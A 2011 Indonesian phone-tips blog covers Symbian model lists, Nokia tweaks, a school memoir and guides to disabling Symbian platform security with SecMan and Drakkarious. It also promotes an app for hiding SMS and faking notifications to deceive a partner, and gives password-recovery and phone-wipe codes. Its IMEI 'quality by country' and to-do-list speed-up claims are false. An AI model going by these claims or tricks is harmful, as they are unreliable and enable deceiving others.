Klik "SUKA" Untuk Menyampaikan Rasa Terimakasih Anda Pada Admin

Rabu, 20 April 2011

Mobile Education "List of Symbian Series Phone"


Karena masih banyak yg tidak tau tentang HP apa saja yang mempunyai OS Symbian, oleh karena itu saya berikan sedikit gambaran / daftar list HP yg berSystem Operasi Symbian dari yang lama hingga saat ini.



Frequently Asked Questions=
- Hp saya bisa diinstall aplikasi ini gak?
- Hp saya symbian gak sih?
- Hp saya symbian versi berapa ?
- Hp saya perlu diHack gak sich?
- Yang termasuk HP symbian apa saja?
- dan sebagainya...



» S60 v1 : Nokia 3600, 3620, 3650, 3660, 7650, N-Gage, N-Gage QD | Sendo X, X2 | Siemens SX1 [Kategori HP ini tidak perlu di Hack]

» S60 v2 : Nokia 3230, 3260, 6600, 6620, 6630, 6670, 6680, 6681, 6682, 7610, N90, N70, N72 | Panasonic X700, X800 | Samsung SGH-D720, D730 | LENOVO P930 [Kategori HP ini tidak perlu di Hack]

» S60 v3 : Nokia : Nokia C5-00, E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E75, E90, N71, N73, N75, N76, N77, N78, N79, N81, N82, N85, N86, 3250, N80, N91, N92, N93, N93i, N95 | Samsung i400, i520 | LG KS10 [Kategori HP ini perlu di Hack]

» Nokia S60 v5 (OS 9.4) devices : Nokia 5800 XM & N97 [Kategori HP ini perlu di Hack]

» S80 Devices : Nokia 9210i, 9290, 9300i, 9500
[Kategori HP ini bisa di Hack bisa juga tanpa di Hack]
» Nokia S90 : 7710
[Kategori HP ini bisa di Hack bisa juga tanpa di Hack]
» Symbian UIQ : SE-P900/P910 [Kategori HP ini bisa di Hack bisa juga tanpa di Hack]


*NB
- Daftar list diatas hanya sebagian besar yang populer dipakai orang.
- Untuk mengetahui OS dari HP keluaran terbaru kalau untuk Nokia xpress music & navigator & E-series serta C-series biasanya S60v3, untuk Nokia communicator biasanya s80.



Untuk lebih jelasnya kita perhatikan juga generasi nokia series yang lain secara lebih detail berikut.

DAFTAR NOKIA S40 (JAVA) (Series 40 Developer Platform):
Diurutkan berdasarkan edisi dan ukuran Layar:

S40 1st Edition
(128×128)
2355, 6651, 6010, 6650, 3125, 6610i , 6560, 6012, 6015i, 6015, 3205, 3108, 3120 , 2650, 7200, 6810, 6820, 3100, 6225, 3200, 3100, 6108, 7250i, 6585, 3300, 3300 Americas, 6220, 6800 Americas, 6200, 6100, 7210, 6610, 7250, 5100, 6800
(96 x 65)
Nokia 3587i, 3587, 6010, 3586, 3586i, 3595, 3585i, 8910i, 3530, 3510i
(128×160)
Nokia 7600

S40 2nd Edition
(128×128)
Nokia 2626, 2610, 5140, 5140i, 6020, 6030, 6230, 3220, 6235, 6235i, 6822, 7260
(128×160)
Nokia 6060, 6080, 6070, 5070, 6103, 6102i, 6155, 6155i, 6152, 6255, 2855, 3152, 3155, 3155i, 7270, 7360, 6102, 6101, 6170
(208 x 208)
Nokia 8800, 8801, 6230i

S40 3rd Edition
(128×160)
Nokia 3109 classic, 3500 classic, 3110, 6086, 5200, 6085, 6151, 2865i, 2865, 6136, 6125, 6165, 6111
(240×320)
Nokia 6131NFC, 6300, 6133, 5300, 6288, 7390, 7373, 6275i, 6275, 6126, 6131, 6282, 6233, 6234, 7370, 6280, 6265i, 6265, 6270, 8600 Luna

S40 3rd Edition : Feature Pack 1
(128×160)
Nokia 6151, 6136, 6125
(240×320)
Nokia 6131NFC, 6133, 6126, 6131, 6233, 6234, 8600 Luna
(208 x 208)
Nokia 8800 Sirocco Edition

S40 3rd Edition : Feature Pack 2
(128×160)
Nokia 3500 classic, 3109 classic, 3110 classic, 6086, 5200, 6085
(240×320)
Nokia 6300, 5300, 7390, 7373

S40 5th Edition
(128×160)
Nokia 1680 classic, 2600 classic, 7070 Prism, 2660, 2630, 2760
(240×320)
Nokia 3610 fold, 5000, 5130 XpressMusic, 6208 classic, 6263, 6555, 7500 Prism, 6267

S40 5th Edition : Feature Pack 1
(128×160)
Nokia 2220 slide, 2320 classic, 2323 classic Nokia 2330 classic, 2680 slide, 2690, 2720 fold, 3555
(240×320)
Nokia 2700 classic, 2730 classic, 3208 classic, 5220 XpressMusic, 6600 slide, 6600i slide, 6600 fold, 3600 slide, 6212 classic, 6300i, 3120 classic, 8800 Arte, 8800 Carbon Arte, 8800 Gold Arte, 6301, 5610 XpressMusic, 5310 XpressMusic, 7100 Supernova, 7210 Supernova, 7310 Supernova, 7610 Supernova, 7900 Prism, 6500 classic, 6500 slide

S40 6th Edition
(240×320)
Nokia 3710 fold, 3720 classic, 2710 Navigation Edition, 5330 Mobile TV Edition, 6260 Slide, 6303 classic, 6303i classic, 6350, 6700 classic, 6750 Mural, 7020, 7230, 7510 Supernova, X2, X3
(320×240)
Nokia C3, X3-02


Jika didaftar tidak ada tipe perangkat Nokia Anda, bisa dikenali dengan cara:
Ciri-ciri Nokia S40:
- Bukan Nokia tipe N atau E, dan bukan tipe 3230, 6270, 6260, 6600, 6620, 6630, 6670, 6680, 6681, 6682, 7610, 3250 , 5230 , 5700 , 6110 , 6210 , 6120 c, 6220
- Nokia S40 TIDAK BISA membuka 2 game atau aplikasi BERBEDA secara bersamaan.


DAFTAR NOKIA S60 SERIES

Nokia S60 5th Edition Symbian OS9.4
nokia 5228, nokia 5230, nokia 5233, nokia 5235, nokia 5250, nokia 5530 xpressmusic, nokia 5800 navigation edition, nokia 5800 xpressmusic, nokia 5800i xpressmusic, nokia c5-03, nokia c6-00, nokia e6, nokia n97, nokia n97 mini, nokia x6, nokia x7

Nokia S60 3rd Edition Symbian OS
Os9.3 - Feature Pack 2 (FP2)
Nokia 5320 XM, 5630 XM, 5730 XM, 6210 Nav, 6220c , 6650 fold, 6710 Nav, 6760 slide, 6790, E63x, E71x, E75, N78, N79, N85,N86 8MP, N96.

Os9.2 - S60v3 FP1
Nokia N95 8Gb, N82, N76, E90 Comm, E71, E66, E63, E51, 6290, 6124c, 6121c, 6120c, 6110 Nav, 5700 XM

OS 9.1 - S60v3 Pre-PF1
176x208 : 3250, N91
208X208 : 5500
240X320 : N73, N93, N95
320X240 : E61, N71, N92

Nokia S60 2nd Edition Symbian OS

S60v2 OS 8.1 FP3
N70, N72, N90

S60v2 OS 8 FP2
6630, 6680, 6681, 6682, 9300, 9500

S60v2 OS 7 FP1
6600, 7610, 6670, 6260, 3230

Nokia S60 1st Edition Symbian OS 6.1
7650, 3650, 3660, Nokia N- Gage, N-Gage QD


DAFTAR NOKIA S80 SERIES

Nokia S80 1th Edition
Nokia 9210, 9210i, 9290

Nokia S80 2th Edition
Nokia 9300, 9300i, 9500

Nokia S80 Future Edition
Nokia E90


DAFTAR NOKIA S^3 SERIES
Nokia C6-01,Nokia C7-00, Nokia E7-00, Nokia N8 (RM-596)

Selasa, 19 April 2011

MobilEvolution "Menyembunyikan SMS Nomor2 Tertentu"

Pengenalan=
Biasanya aplikasi ini marak digunakan para PlayBoy maupun PlayGirl karena dg memanfaatkan fungsi app ini kita bisa
+ Menyembunyikan nomor2 tertentu, secara specific dan efectiv, biasanya nomor2 selingkuhan yg diumpetin, wkwkwk
+ Mengubah notifikasi SMS yg biasanya "Message Received" bisa kita ganti sesuka hati untuk memanipulasi si korban, wkwkwk... misalnya "Low Battery" "Low Signal" "1000 emails received" dan lain lain, Keren bukan ?
+ SMS yg ada di inbox asli HP kita bisa kita sembunyikan juga bisa kita tampilkan, Hide & Show melalui app berikut ini.


Cara=
Lasung aja ini sedot [Download]


Pengaturan=
+ BlackList; untuk nomor yg ingin disembunyikan smsnya, jadi smsnya itu masih ada cuma gak keliatan di indox sms aplikasi PESAN bawaan HP kita. cara melihatnya kita buka saja app yg diatas tadi, jangan lupa app.nya dikasih password biar si korban gak bs membukanya.
+ Untuk feature yg lain bisa dipelajari sendiri, kalo pengen tanya silahkan tinggalin komentar dibawah ini.


Required=
+ S60 OS6 OS7 OS8 OS8.1

MobilEvolution "Memainkan Video PC di HP tanpa Konversi Format"

Tujuan=
-Memainkan video format format komputer seperti FLV,SWF,AVI,DIVX,MPEG,dan sejenisnya directly langsung melalui smartphone anda.

Cara=
-Install aplikasi ini (Pilih sesuai series hape anda)
-Restart HP anda.
-HP anda sudah siap untuk memainkan video dengan texture tinggi di smartphone anda.

Required=
-Symbian Smartphone OS
-Video frame size must not larger than VGA size and more than 30fps.

MobilEvolution "Modif HP Symbian Jadi Remot TV"

Tujuan=
* Infra merah pada HP bisa difungsikan sebagai remote control TV, DVD, Home Theater, Tape, dsb.


Cara=
* Install aplikasi ini (Download)
* Restart HP anda.
* Buka aplikasinya
* Pilih pengaturan konfigurasi key secara manual atau bisa pilih langsung sesuai MERK perangkat nya.
* Misal pilih TV PANASONIC, klik OK, Save Key.
* Use this config.
* Cliiingss !!! arahkan infra merah HP ke TV lalu tekan tombol di HP, waoow keren bukan ?
* Tadi kan TV kalo mau pindah ke remot DVD, TAPE, atau yang lain yg masih sama2 satu merk tinggal tekan tombol pagar "#"

NB=
* Jarak inframerah dan perangkat elektronika hanya bekerja antara 5cm sampai 300cm.

MobilEvolution "Modif Start Menu & Kode Kunci Keypad HP Symbian"


HP yg support dimodif=
-s60v2
-s60v3
-s60v5

Tujuan=
-Modifikasi start menu symbian agar tampil lebih keren dan modif, menu bisa ditampung dishortcut navigasi menu depan, lebih cepat kalo kita mau buka apa2 lebih gampang.
-Merubah kode kuni keypad yang membosankan, biasanya Tombol kiri atau tombol Menu lalu tombol bintang "*", nah dsini bisa kita rubah dengan segala tombol, mau pake angka mau pake huruf mau kode kunci satu buah klik atau berapa klik bisa kita atur, kalau untuk kod kunci defaultnya sich arah navigasi bawah tekan dua kali.
-Menon-aktifkan master security code & juga mengaktifkan.

Caranya=
1. install aplikasi ini
-untuk s60v2 OS7 (Download)
-untuk yang lain bisa googling sendiri dengan keyword nama aplikasi MobiFun.Soft.Smart.Settings diikuti seri OS HP symbian anda, saya yakin pasti nemu.
2.Restart HP anda.
3.Cliiiing.....!!!! sebuah taskbar layaknya pada komputer sudah muncul di HP anda.
-untuk mengatur kunci otomatis termasuk kunci pembuka dan periodenya buka aplikasi tersebut lalu pilih > Auto Lock & Easy unlock
-untuk menambah menu shortcut masuk > Start menu setting
-untuk menonaktifkan fungsi master code hp masuk > Master security setting



*NB=
-untuk HP selain s60v2 pastikan hpnya sudah diHack, ada 3 cara ngeHack HP tsb disitus ini, ini cara yg menurut saya termudah adalah yg ini (Click).
-jika kurang jelas mari bisa tulis komentar dibawah ini.

* Rekomendasi Admin  - Baca Juga Ya*

Senin, 18 April 2011

Biography of Topan Bayu Irawan about SMK Muhamka








SMK Muhammadiyah Kajen Yang Tak Terlupakan
Saya tersenyum sendiri manakala teringat ketika saya baru saja masuk ke SMK Muhammadiyah Kajen. Saya masuk ke SMK Muhammadiyah Kajen setelah saya selesai cuti 1tahun dari kelulusan saya dari MTs Ma'arief NU Karanganyar. Saya sempat berhenti sekolah selama 1tahun setelah lulus dari SMP karena saya sempat merasa frustasi gara-gara di MTs kebanyakan hafalan ayat-ayat arab yang sangat panjang. Tapi setelah beberapa bulan setelah itu saya mulai berfikir kalau saya begini mau apa nantinya. Kemudian saya sadar kalau saya sudah punya bakat utak-atik barang-barang elektronik kira-kira sejak kelas 4 SD. Berhubung ada informasi dari tetangga bahwa ada sekolah kejuruan elektro audio video, saya jadi tertarik dan bangkit kembali keinginan saya untuk meneruskan bakat dan potensi pada diri saya. Serta dukungan dari keluarga sayapun cukup membangunkan hati saya. Lalu sayapun dengan semangat langsung mendaftar di SMK Muhammadiyah Kajen pada hari pertama pendaftaran. Sayapun masih ingat saya mendapat nomer pendaftaran 1001 karena saya pendaftar pertama untuk jurusan Audio Video. Nah pada hari itulah yang menjadi kenangan yang tak terlupakan oleh saya. Karena saya dulu ketika mendaftar rambut saya masih semiran warna merah dan seragam saya juga saya keluarkan. Karena saya belum tau budaya di SMK Muhammadiyah Kajen saat itu. Saya bertemu Pak Tono berjabat tangan sambil pandangannya ke saya itu sungguh-sungguh tidak enak dan nampaknya serem,hehe. Tapi Pak Tono belum berani bogem mentah saya kali ya, kan saya murid baru. Hehe. Kemudian test baca Al-Quran oleh Bu Sofi saya masih ingat saya sungguh gelagepan sekali waktu itu. Tapi nampaknya dulu dipandangan saya Bu Sofi itu guru yang kalem tapi eh ternyata teman-teman banyak yang takut,haha. Tak tau kenapa. Saya sih biasa saja kalo saya tak merasa bersalah kenapa harus takut. Ya kan teman-teman? Lalu saya juga masih teringat pada waktu tes kesehatan oleh Pak Cipto. Saya merasa sekali bahwa dia memandangi saya dengan beribu pikiran negatif karena penampilan saya sungguh kelihatan anak berandalan kali ya. Padahal belum tau sih kalau saya itu anak yang baik hati,penurut dan juga sopan sebenarnya. Waktu itu saya sempat langsung divonis dikira punya tato banyak dibadan,tapi setelah dicek tidak ada,kasihan deh lo pak,hehe. Saya juga dituding bertindik,kebetulan waktu itu telinga saya lagi memar gitu lah bekas digigit serangga,nah dikiranya itu bekas tindik,saya sempat lama diruang tes karena saya mengelak bahwa saya memang tidak bertindik. Nah setelah beberapa menit berdebat di ruang tes kesehatan akhirnya saya dapat meyakinkan Pak Cipto kalau itu bukan bekas tindik dan saya sungguh belum pernah ditindik. Kemudian setelah berbagai tes selesai, saya pulang dan menunggu pengumuman diterima setelah beberapa hari ternyata saya diterima dengan hasil peringkat seleksi posisi diatas. Tidak tau itu berdasarkan nilai atau asal-asalan mengurutkan tapi waktu itu sempat membuat saya semakin percaya diri dan semangat sekolah di SMK Muhammadiyah Kajen. Terbukti dengan nilai-nilai saya dari kelas 1 sampai saat ini cukup memuaskan orang tua saya dan diri pribadi saya meski sempat turun drastis beberapa semester dikelas 2. Serta terbukti dengan absensi kehadiran saya yang sampai saat ini belum pernah alpha satu kali pun. Terimakasih buat guru-guru pembimbing di SMK Muhammadiyah Kajen yang patut dibanggakan kesungguhan dan keikhlasannya dalam mengajar kami. Serta buat teman-teman semangat dan semangatlah sekolahmu dan jangan sia-siakan apa yang sedang kau jalani saat ini. Good Luck teman-teman.
04 April 2010 jam 9:22


Cerita diatas adalah tugas ujian praktek yang diberikan oleh Guru Bahasa Indonesia Bapak Annasrullah, dan sekarang saya sudah lulus dengan prestasi yang alhamdulillah memuaskan dan patut saya syukuri, thanks Allah. Saya menjadi Lulusan Terbaik (Best Graduated) dari SMK Muhammadiyah Kajen untuk Jurusan Teknik Elektronika Audio Video 2010.


Ya seperti itulah sedikit biography tentang saya dan Smk Muhamka, kecintaan saya terhadap dunia teknologi sudah tidak bisa diragukan lagi sehingga sampai saat ini saya masih menggeluti dunia teknologi khususnya Electronika, Komputer dan Handphone. Perkenalkanlah saya Topan Bayu Irawan seorang Technician dari Pekalongan, Indonesia, the owner of this Website. Salam persahabatan...

Mobile Education "MENGETAHUI KUALITAS HP DARI KODE IMEI ke 7&8"

Pada Saat kita membeli HP
2nd/bekas tanpa pengetahuan yang
jelas,sama hal nya saja kita
seperti membeli kucing dalam
karung...
Padahal sebenarnya apabila kita
punya pengetahuan yang cukup
tentang HP,kita bisa mendapat
barang bagus. Karena HP baru VS
HP 2nd harganya terpaut cukup
jauh

caranya :

(HP nya harus yang GSM,bukan
CDMA dan yg merk NOKIA.)

Perhatikan no IMEI nya!
Untuk memunculkan no IMEI
, ketik : *#06# di layar standby!
setelah itu no IMEI anda akan
keluar....
Perhatikan 2 angka yang yg ke 7
dan 8 dari kiri

Jika angka ke 7 & 8 adalah 02
atau 20 maka artinya HP anda
dibuat di ASIA yang mempunyai
kualitas jelek

Jika angka ke 7 & 8 adalah 08
atau 80 maka artinya HP anda
dibuat di Jerman yang mempunyai
kualitas tidak terlalu jelek
Jika angka ke 7 & 8 adalah 01
atau 10 maka artinya HP anda
dibuat di Finlandia yang mempunyai
kualitas bagus
Jika angka ke 7 & 8 adalah 03
atau 30 maka artinya HP anda
dibuat di Cina yang mempunyai
kualitas sangat jelek
Jika angka ke 7 & 8 adalah 04
atau 40 maka artinya HP anda
dibuat di India yang mempunyai
kualitas sangat sangat jelek
Jika angka ke 7 & 8 adalah 00
maka artinya HP anda dibuat di
Prancis yang mempunyai kualitas
terbaik di dunia Mobile Phone...
Berati saran saya cari lah yg
nomor imei ke7 dan ke8 nya 00
atau 10 atau 01

Hack Trick 768 "Hack HP Symbian s60v3 s60v5 via BiNPDA hacking tools" (Cert. Error, Expired)


INDONESIAN VISITORS: Kamu bisa pilih bahasa ke bahasa indonesia pada kolom "Select Language" diatas judul posting ini untuk mempermudah tutorial Cara Hack HP Symbian s60v3 s60v5 dengan menggunakan cara berikut ini.



Hacking Made Easy by BiNPDA.
The most Simplest way possible..!!




» BiNPDA Signing & Hacking Tools.rar [Downloads] [included Secman.exe & Needed tools]



In order to install "Unsigned" releases from BiNPDA only and hack your phone{i.e to view all private folder}, you need to go trough a one-time procedure.






You will need to run "SecMan.exe", This program allows you to install all unsigned files from BiNPDA without signing them every time...


Please Read the Brief & simplified procedure for using them accordingly..







Just follow 4 simple steps...






All the Tools needed are provided below, Thanks to BiNPDA !








Step 1 :


Install the TRK application for your Respective phones using the list below...






s60_3_0_app_trk_2_8_6.sisx for SymbianOS9 devices WITHOUT FP1









s60_3_1_app_trk_2_8_6.sisx for SymbianOS9 devices WITH FP1











> Open TRK application from your phone, Select USB mode from settings

{Don't use Bluetooth Connect} Keep Metro TRK running on phone.








Step 2 :


Now Double Click on Secman.exe (provided below) and Follow Instructions..






Now Security manager will look for your com ports to which your phone has been connected...


If you Know your Port, select it and click NEXT..


If you Don't, then simply "Check" the Find Metro TRK ports automatically and click Next.








Step 3 :


Security manager now install the "Secman" in your phone.






Step 4 :


Now the last and final part which is done using your phone...






> Open the Secman from your phone








* Turn Plat security OFF *


This option will Hack your phone in other words you will be able to enjoy the Symbian Freedom, like any other hacked phone you can Edit and move Private files n folders..






You can " Turn plat security ON " when you are Done.








Now the Important part...








* Install Root certificate *


With this you can install unsigned files from BiNPDA, you will not be prompted for any certificate errors during installation of unsigned files like Normal Signed files.






* Restore Default *


This will Remove all Root certificates and Remove Capabilities, making you phone like you used to use your phone before hacking.






* Uninstall Secman *


will remove it from your phone.






NOTE :


Please keep in mind, if you format / upgrade your phones firmware, you'll need to do steps 1 & 2 again and after that manually install those apps from Application Manager.






Benefits:


Your Phone is now Hacked plus


Now you can install Unsigned files from BiNPDA and your Phone will not ask for Certificate errors and Blah blah...


No Certificates no symbiansigned...!!


Enjoy the topnotch work of eminent Team BiNPDA





* All the credits go to BiNPDA & Special thanks to farhazadeeb




Hack Trick 767 "Hack HP Symbian s60v3 s60v5 via Drakkarious" (Cert. Error, Expired)


INDONESIAN VISITORS: Kamu bisa pilih bahasa ke bahasa indonesia pada kolom "Select Language" diatas judul posting ini untuk mempermudah tutorial Cara Hack HP Symbian s60v3 s60v5 dengan menggunakan cara berikut ini.

Drakkarious Hack phones and All apps installer {unsigned and Expired Files}




Drakkarious 2.0 FP1 & PreFP1{Install unsigned Files}




Have you ever wanted to install an unsigned file without having to sign it like we used to on s60v2 phones?
Have you ever wanted to send an application over bluetooth and install it right away on the receivers phone?




Well this is your lucky day, Drakkarious.sis, an application especially developed for this very same reason.




All you have to do is install this application, follow the on screen instructions wich you easly learn after doing it 1 time and your ready to hack any phone, anywere...




With this app you can install:
Unsigned, Signed, BiNPDA, Non-BiNPDA, Dated, Out-Dated files etc etc etc... Give it a try and you'll see.




Inside instructions:
Change phone date to 15-05-2007




Drakkarious Hack Compilation.
This program will install:
CapsOn
CapsOff
HelloCarbide
X-plore




NOTE:
If you have any of these programs installed on your mobile there is no problem continuing the installation, however, this ones have been tested, none others, so if you have any trouble during the procedure uninstall the ones you have and re-install Drakkarious.sis.




After installing please follow this procedure:
1.-Run X-plore and press "0", tick the 4 boxes (dont un-tick if ticked already)
2.-Without closing X-plore switch to the menu and run hellocarbide
3.-Inside hellocarbide press options and chose Menu1 and answer "yes".
4.-Go back to X-plore and extract installserver.exe and CProfDriver_SISX.ldd from your c:\hack.rar into c:\sys\bin
5.-Restart your phone.
6.-Install whatever you want on your phone, even if it is unsigned




Run capsOff if you wish to see private folders using X-plore and capsOn to hide them again
NOTE: I advice you to always hide private folders after you have completed whatever you wanted to do inside them...




Enjoy... Signed(lol) Drakkarious




Special thanks to:
Olti
BiNPDA
Leftup
FCA00000




NOTE :
AFTER COMPLETING YOU MUST RESTART YOUR PHONE TO BE ABLE TO INSTALL ANY APP, AND REMEMBER TO ALWAYS PUT YOUR PHONES DATE BACK TO THE PRESENT AGAIN, ALWAYS CHOOSE THE CORRECT VERSION FOR YOUR PHONE, AND IF YOU DONT YOULL NEED TO MANUALLY REMOVE INSTALLSERVER.EXE FROM C:\SYS\BIN\ USING X-PLORE AND HELLOCARBIDE... IF YOU MAKE THIS MISTAKE PLEASE REPEAT THE PROCESS USING THE CORRECT VERSION: FP1 OR PREFP1




Devices list:










VersioN 2,01(3)
VersioN 2,02(3) (BETA)
Just for those who cant see private folders with the normal version of hellocarbide...




Thanks To Drakkarious




Friends if you want to install new version of Xplore u have to first install the latest version of Xplore and then install Drakkarious so that will replace to the new one.And now im adding the Xplore 1.22 version which has full access to System folders with this Xplore we can access the folders without caps off thanks to Disabled for this file




» Drakkarious_2.01_FP1_and_PreFP1.sis Drakkarious v2.01.SiS [606kb]
» Drakkarious_2.02_FP1_and_PreFP1.sis Drakkarious v2.02.SiS [606kb]
» Drakkarious_2.01_3250_5500_E50_E51_E61.sis Drakkarious 2.01 (3250,5500,E50,E51,E61).SiS [757kb]
»X-plore_v1.22_S60_3rd_Full_access.sisx X-plore v1.22 (Full access).sisx [418kb]

Mobile Trick "Speed Up Phone via Default 'To Do List' Phone App" "Mempercepat Performa HP dgn Scripting di App Bawaan Hp"

First go to your To-do List (default app of your Phone)

- Make a note and input as follows
Subject: Speed
Due Date: 01-29-2005(mm-dd-yy)
Priority: set to High
then press Done

- Make a second Note and input as follows
Subject: Qoukie
Due Date: 01-29-2005(mm-dd-yy)
Priority: set to Low
then press Done

- Do not exit yet, Press the Option of your Subject note w/c is Speed and Mark as done

- then Press the Option of your Subject note w/c is Qoukie and Mark as done

- Now, reboot your mobile.

Mobile Trick "Increase Memory Card Space" "Menambah Kapasitas Memory Card HP"

Increase Your MMC Space

Your files in MMC are stored in multiple (disk) blocks. So if you format using 16K block, the space used will be 16K eventhough your file is just 1K.

If you buy MMC, it is usually preformatted with 16K block. Therefore alot of space is wasted as most installed program files are usually less than 2K.

You will need a card reader to do this:-

1. Connect card reader and copy all your files in the MMC to computer disk. (Make sure you set the show all/hidden/os files to "on")

2. Do a format of the MMC using command line "format" and use the /A=size option.

Alternative, you can use the Disk Management in Adminstrative Tools to format. Make sure you select FAT. For 256MB MMC, smallest block you can use is 4K, 128MB is 2K, 64Mb is 1K and 32MB is 512B.

(Note: You cannot use the phone "format MMC" to do this as the format just clear the allocation table and does not change the block size)

3. Copy back all files to MMC.

Now you will find that you will have more space. 256mb MMC got back 30+ mbs

Mobile Trick "Reset Operator Logo" "Cara Menghapus Op-Logo"

How to reset the operator logo.

1) Go to the following dir :
C:\System\Apps\Phone\Oplogo

2) Delete any file in this directory

3) Restart the phone

Mobile Trick "Locking Default Application" "Mengunci Aplikasi Bawaan HP"

Locking default application

Want to Locking default application?
Don't want everybody read your SMS?
Then just Lock Messaging Application, here is the way....

1) Open 3rd Party Application like Fexlporer, x-plore...
2) Go to Z/System/Apps/mce
3) Mark two files of mce.aif and mce.app
4) Press Option -> Edit -> Copy
5) Then go into X/System/Apps/ (X stands for either C or E)
6) Create a folder with name "Locked"
7) Paste the two files in that folder
8) Rename mce.aif into Locked.aif
9) And mce.app to Locked.app
9) After that, wait for 5 seconds and then try to open messaging application.
10) You should see the Messaging can't be opened
11) You're finished now.


this trick also work for other application like Phonebook,Gallery,etc..
trik ini juga bisa untuk menyembunyikan pesan,inbox,sms,gallery,kontak,dll..

Mobile Education "Bluetooth Connection Guide"

Bluetooth Connection Guide.

This is a "How To" for Connecting the Nokia Series 60 device (Nokia 7650, 6600, 3650, 3660 etc...) via Bluetooth TM with the Windows Widcomm software used by TDK, Billington, MSI and others Bluetooth USB Vendors. The guide was created with the 7650 hadset but the steps are similar for other Series 60 devices and have been checked with the 3650 and 6600.

1.Pairing the computer and the Series 60 Handset
Pairing is the process of swapping pass keys and setting up a trusted connection between the Bluetooth USB adapter / card connected to the PC and the 7650 handset. Save any files and close any applications you may have been working on.

2. Set up Bluetooth TM on the 7650 by going to the Main Menu, selecting Connect and then Bluetooth.

3. Make sure the Bluetooth option is On and My Phone's Visibility is Shown to all. Remember what is in My Bluetooth Name - or edit it to one of your choice - this is what your 7650 will be seen as by other Bluetooth TM devices.

4. Right Click on the Bluetooth Icon in the system tray, on the menu that appears go to Setup and then click on Security.

5. A window appears and all being well the right hand pane will have your 7650 (titled what ever you have entered into the phone's My Bluetooth Name entry). If nothing appears click Refresh and your phone should then appear. Highlight the 7650 and click Execute Pairing.

6. A window will pop up asking for a PassKey. Enter in a numeric only passkey and click OK.

7. On the 7650 a screen pops up asking you to enter a passkey - key in the same number you just typed into the PC.

8. By default any connections from your PC to the 7650 must be manually accepted on the 7650. You have an option to set up a connection from the PC to your 7650 as authorized, this means when you connect from the PC to the phone it won't ask you if it's ok and will connect automatically.

9. To set it as automatic: On the 7650 in the Bluetooth TM Setting Screen, you joystick right to the Paired Devices screen, highlight the Computer you just paired with and press Options, select Set as Authorized and Yes. You will then see a padlock icon beside the paired device - this device will no longer require manual authorization for connections to the 7650.

Now you should set My phone's visibility to Hidden - so that unknown devices searching won't see your phone. You can still be connected to by any paired devices. Remember to switch it to Visible if you want to pair with a new device or receive a file / business card from someone with an unpaired device.

Mobile Education "Backup Setting Data HP Symbian"

Backing up Phone Settings

If you ever come to a point when you need to hard format your phone or maybe upgrade to a new firmware, I'm sure definately would like to save the current settings of your phone. So this is what you should do;

How to backup phone settings to MMC.

Menu>Extras>Memory>Options>Backup phone mem.

Once the formatting or upgrading is done, you can then restore back the settings by doing;

Restoring settings after phone format.

Menu>Extras>Memory>Options>Restore from card.

MobileRepair "Retrieve Lost MMC Password" "Cara Mendapatkan Password MMC yg Lupa"

Retrieve lost MMC password

1) Open file explorer. (SeleQ, FExplore, X-plore)

2) Search for 'MMCSTORE' ussualy in System [C:\]

3) When you find it, send it to your PC

4) On PC, open the file with Notepad, or any word processor

5) there goes your password!

MobileRepair "Can'T Delete Inbox Message" "SMS Tidak Bisa diHapus"

Can't delete files in your Inbox?

When you cant delete a file which is in your inbox the normal way, here is what you can do..

1. Install FExplorer.

2. Launch it and goto the path/folder of your message inbox. If its on the C drive, it would be C:\system\Mail\00001001_S and the same if its on the E.

3. You will notice there are more folders, 0 to9 and a to f. Just go look into all those folders and you should be able to find the file that you wanna delete.

4. Once found, click on Options>File>Delete.

5. Exit FExplorer & goto your Inbox to delete the file again.

Baca juga rekomendasi terkait:

MobileSecret "Copy Paste Text on Symbian"

How to copy and paste text

Press and hold the pencil key and select your text using the scroll key.

Left function key will change to 'Copy'. Press it to copy the selected text to clipboard.

You can paste the clipboard contents the same way:

press and hold the pencil key and press 'Paste'. Or, press pencil key once and select 'Paste'

MobileRepair "Error App Close Main during start up" "Mengatasi App Error Main Close saat booting"

Error of App Close Main! During Start Up

You can fix the app close main error..

1) Open 3rd Party Application like x-plore, Fexplorer.
2) Go to c:/system/bootdata & delete 'FirstBoot.dat'
3) Turn off phone & take out your MMC card
4) Turn on phone and put in current time/date
5) Wait for it to boot up then turn off phone again.
6) Put MMC back in and turn on phone.

MobileTrick "Block Receive Calls" "Cara Memblokir Telfon Masuk"

Pada posting sebelumnya Bayu sudah ngasih trick buat block sms masuk di Posting ini "How to Block Receive SMS", nah sekarang bagian Cara memBLOKIR panggilan masuk akan saya jelaskan dalam 2 bahasa dibawah ini.





Indonesian:

Tidak ingin menerima panggilan? Ketikkan ** 21 * 999999 #, lalu tekan tombol penjawab telepon berwarna hijau. Jika seseorang memanggil Anda, ia akan mendengar 'nomor yang anda tuju tidak eksis', keren bukan? Untuk menonaktifkan fitur ini, ketik # ​​# 21 #, lalu tekan tombol penjawab telepon lagi, dan semuanya akan menjadi normal.







English:

Do not want to receive calls? Type **21*999999#, then press the green answering key. If someone is to call you, he / she will hear ‘the number you dialed does not exist’, isn’t it cool? To disable this feature, type ##21#, then press the answering key again, and everything will be normal.

MobileTrick "Unlock Nokia Security Master Code"

Almost all Nokia mobile phones have a lock code, once it is enabled, you have to enter it whenever turn your mobile phone on or change the SIM card to block access from others to your personal data and information like SMS, call log and phone book. The default code is 12345 (it may vary depending on the model of your cell phone), while this lock code is different from your service provide unlock code which is used to prevent your from using other service provider’s network.
Many people who enabled lock code usually change the default code, and some people are asking for help on the forum because they forget the new lock code they set. In order to tackle this, someone developed a security master code calculator for Nokia cell phones. You just have to enter your IMEI code (type *#06# and you get it), and it will generate the security master code, you can use this code to unlock your cell phone.
You can find this security master code website here, but before you visit it, check out this compatibility list first.
In case this calculator does not help, you may have to restore to factory settings by pressing simultaneously ‘Green’ + ’3′ + ‘*’ and at the same time when turning your cell phone on, which is similar to type *#7370# on your cell phone.

Kode Rahasia HP Android

Kode-kode ini bervariasi, tergantung pada ponsel yang berbeda, beberapa kode rahasia mungkin tidak tersedia. Harap berhati-hati sebelum mencoba kode ini pada ponsel Anda, dan Anda bertanggung jawab atas segala konsekuensi dari tindakan Anda.


*#*#7873778#*#*
SUPER SU
*#*#3646633#*#*
ENGINEERING MODE
*#*#4636#*#*
Display cell phone, battery, usage statistics and WiFi information
*#*#7780#*#*
Restore to factory settings, do not delete preinstalled apps and SD card files
*2767*3855#
Restore to factory settings; delete all files in SD card
*#*#197328640#*#*
Launch service mode to test and change certain settings
*#*#232339#*#* or *#*#526#*#* or *#*#528#*#*
